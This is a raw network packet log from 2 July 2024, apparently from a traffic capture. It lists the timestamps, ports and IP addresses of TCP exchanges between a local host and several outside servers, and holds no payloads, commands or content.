Jul 2, 2024 00:05:08.236515045 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.236526966 CEST	443	49730	188.114.96.3	192.168.2.6
Jul 2, 2024 00:05:08.236552954 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.236552954 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.236582994 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.236588001 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.236593962 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.236604929 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.236617088 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.236617088 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.236646891 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.236654997 CEST	80	49714	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.236656904 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.236728907 CEST	49714	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.236784935 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236819983 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236850023 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.236866951 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.236871004 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236884117 CEST	80	49717	77.91.77.80	192.168.2.6
Jul 2, 2024 00:05:08.236957073 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.238409042 CEST	49736	443	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.238440990 CEST	443	49736	45.130.41.108	192.168.2.6
Jul 2, 2024 00:05:08.238512039 CEST	49736	443	192.168.2.6	45.130.41.108
Jul 2, 2024 00:05:08.239886045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.239897966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.239908934 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.239963055 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.239985943 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.239996910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240005970 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240006924 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240015984 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240048885 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240058899 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240067959 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240072966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240077972 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240087032 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240087032 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240091085 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240097046 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240102053 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240107059 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240115881 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240164042 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240442038 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240452051 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240462065 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240472078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240478039 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240497112 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240499973 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240511894 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240523100 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240533113 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240536928 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240544081 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240552902 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240561962 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240564108 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240575075 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240586042 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240596056 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240598917 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240598917 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240622997 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240685940 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240731001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240741968 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240751982 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240761995 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240772009 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240778923 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240778923 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240802050 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240829945 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240848064 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240858078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240869045 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240880013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240890026 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240900993 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240900993 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240911961 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240936041 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240936041 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240947008 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.240961075 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240971088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240984917 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.240994930 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241003990 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241004944 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241014957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241024971 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241025925 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241034985 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241048098 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241065025 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241065025 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241089106 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241189957 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241200924 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241211891 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241221905 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241231918 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241242886 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241250038 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241252899 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241264105 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241274118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241275072 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241275072 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241283894 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241286993 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241348982 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241355896 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241365910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241374969 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241385937 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241395950 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241399050 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241405964 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241409063 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241416931 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241426945 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241436005 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241436958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241446972 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241475105 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241475105 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241501093 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241512060 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241520882 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241532087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241542101 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241556883 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241556883 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241569042 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241580009 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241585016 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241595030 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241605043 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241606951 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241619110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241628885 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241628885 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241628885 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241637945 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241647959 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241657972 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241667032 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241668940 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241694927 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241694927 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241903067 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241914034 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241925001 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241936922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241947889 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241952896 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241957903 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241967916 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.241998911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.241998911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242018938 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242028952 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242038012 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242048979 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242058992 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242068052 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242068052 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242069006 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242080927 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242090940 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242099047 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242100954 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242146015 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242146015 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242162943 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242173910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242183924 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242193937 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242204905 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242216110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242227077 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242228985 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242228985 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242232084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242249966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242260933 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242264986 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242271900 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242283106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242291927 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242304087 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242306948 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242314100 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242325068 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242327929 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242327929 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242335081 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242346048 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242356062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242384911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242413044 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242722988 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242733002 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242748976 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242758989 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242764950 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242769003 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242782116 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242786884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242800951 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242805004 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242813110 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242830038 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242858887 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242880106 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242889881 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242899895 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242911100 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.242928028 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242961884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.242961884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243016005 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243026018 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243036032 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243046999 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243057966 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243062019 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243086100 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243108988 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243200064 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243211031 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243220091 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243225098 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243231058 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243236065 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243314981 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243419886 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243546963 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243560076 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243570089 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243578911 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243580103 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243590117 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243601084 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243602991 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243613005 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243639946 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243639946 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243696928 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243706942 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243716955 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243727922 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243737936 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243747950 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243758917 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243769884 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243769884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243769884 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243777037 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243782043 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243823051 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243823051 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243870020 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243885040 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243896008 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243906975 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243920088 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243920088 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243936062 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243940115 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243947029 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243957043 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243967056 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243977070 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243983984 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243983984 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.243988037 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.243998051 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244008064 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244018078 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244031906 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244038105 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244038105 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244038105 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244041920 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244052887 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244062901 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244074106 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244083881 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244108915 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244223118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244235039 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244251013 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244270086 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244290113 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244290113 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244313955 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244324923 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244334936 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244348049 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244374990 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244394064 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244596958 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244609118 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244621992 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244632006 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244645119 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244662046 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244679928 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244702101 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244703054 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244713068 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244723082 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244736910 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244748116 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244750023 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244759083 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244769096 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244780064 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244781017 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244781017 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244790077 CEST	80	49716	77.105.133.27	192.168.2.6
Jul 2, 2024 00:05:08.244815111 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.244820118 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244833946 CEST	49716	80	192.168.2.6	77.105.133.27
Jul 2, 2024 00:05:08.244894981 CEST	49717	80	192.168.2.6	77.91.77.80
Jul 2, 2024 00:05:08.269321918 CEST	80	49717	77.91.77.80	192.168.2.6
